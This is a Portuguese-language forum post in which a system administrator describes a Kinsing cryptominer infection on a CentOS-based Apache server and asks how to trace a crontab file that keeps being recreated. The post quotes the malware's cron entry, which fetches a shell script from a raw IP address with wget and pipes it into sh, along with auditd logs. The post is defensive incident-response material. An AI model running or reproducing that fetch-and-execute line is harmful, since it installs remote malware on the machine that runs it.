carel
(usa CentOS)
Enviado em 14/08/2020 - 17:16h
Boa tarde, peço desculpas se o local de criação estiver incorreto.
A situação é a seguinte:
Temos clientes que utilizam servidores cuja iso é modificado baseada em centos 6.5 e que rodam apache, exim, freeradius e amis alguns serviços.
Ocorreu que um desses servidores foi infectado com o malware kinsing. Eu consegui parar o funcionamento tirando as permissões dos arquivos kinsing e kdevtmpfsi que frealiza mineração.
A minha duvida é como identificar quem esta criando e editando um arquivo em especifico em /var/spool/cron/apache. Esse arquivo contem * * * * * wget -q -O -
http://195.3.146.118/p.sh | sh > /dev/null 2>&1
Utilizei o auditd e consegui a seguinte informação ao utilizar o comando ausearch -f /var/spool/cron/apache -i
type=PATH msg=audit(14-08-2020 16:56:26.753:12422092) : item=4 name=/var/spool/cron/apache inode=30410398 dev=fd:01 mode=file,600 ouid=apache ogid=apache rdev=00:00 nametype=CREATE
type=PATH msg=audit(14-08-2020 16:56:26.753:12422092) : item=3 name=/var/spool/cron/apache inode=30410404 dev=fd:01 mode=file,600 ouid=apache ogid=apache rdev=00:00 nametype=DELETE
type=PATH msg=audit(14-08-2020 16:56:26.753:12422092) : item=2 name=/var/spool/cron/tmp.XXXXFzvyKl inode=30410398 dev=fd:01 mode=file,600 ouid=apache ogid=apache rdev=00:00 nametype=DELETE
type=PATH msg=audit(14-08-2020 16:56:26.753:12422092) : item=1 name=/var/spool/cron/ inode=30409690 dev=fd:01 mode=dir,700 ouid=root ogid=root rdev=00:00 nametype=PARENT
type=PATH msg=audit(14-08-2020 16:56:26.753:12422092) : item=0 name=/var/spool/cron/ inode=30409690 dev=fd:01 mode=dir,700 ouid=root ogid=root rdev=00:00 nametype=PARENT
type=CWD msg=audit(14-08-2020 16:56:26.753:12422092) : cwd=/var/sistema/bloqueio/html
type=SYSCALL msg=audit(14-08-2020 16:56:26.753:12422092) : arch=x86_64 syscall=rename success=yes exit=0 a0=560f047863e0 a1=7ffdd0978840 a2=0 a3=31312e3634312e33 items=5 ppid=6427 pid=8350 auid=apache uid=apache gid=apache euid=root suid=root fsuid=root egid=apache sgid=apache fsgid=apache tty=(none) ses=1307812 comm=crontab exe=/usr/bin/crontab key=apache-file
----
type=PATH msg=audit(14-08-2020 16:57:01.772:12422149) : item=0 name=/var/spool/cron/apache inode=30410398 dev=fd:01 mode=file,600 ouid=apache ogid=apache rdev=00:00 nametype=NORMAL
type=CWD msg=audit(14-08-2020 16:57:01.772:12422149) : cwd=/var/spool/cron
type=SYSCALL msg=audit(14-08-2020 16:57:01.772:12422149) : arch=x86_64 syscall=open success=yes exit=7 a0=7ffe48a5f4c0 a1=800 a2=0 a3=1999999999999999 items=1 ppid=1 pid=24908 auid=root uid=root gid=root euid=root suid=root fsuid=root egid=root sgid=root fsgid=root tty=(none) ses=1297806 comm=crond exe=/usr/sbin/crond key=apache-file
Já tentei deletar o arquivo /var/spool/cron/apache, tirar as permisões com chmod 000 e chmod -x, mas depois de um tempo ele sempre voltar como tava.
Alguem sabe como identificar como esse arquivo é alterado?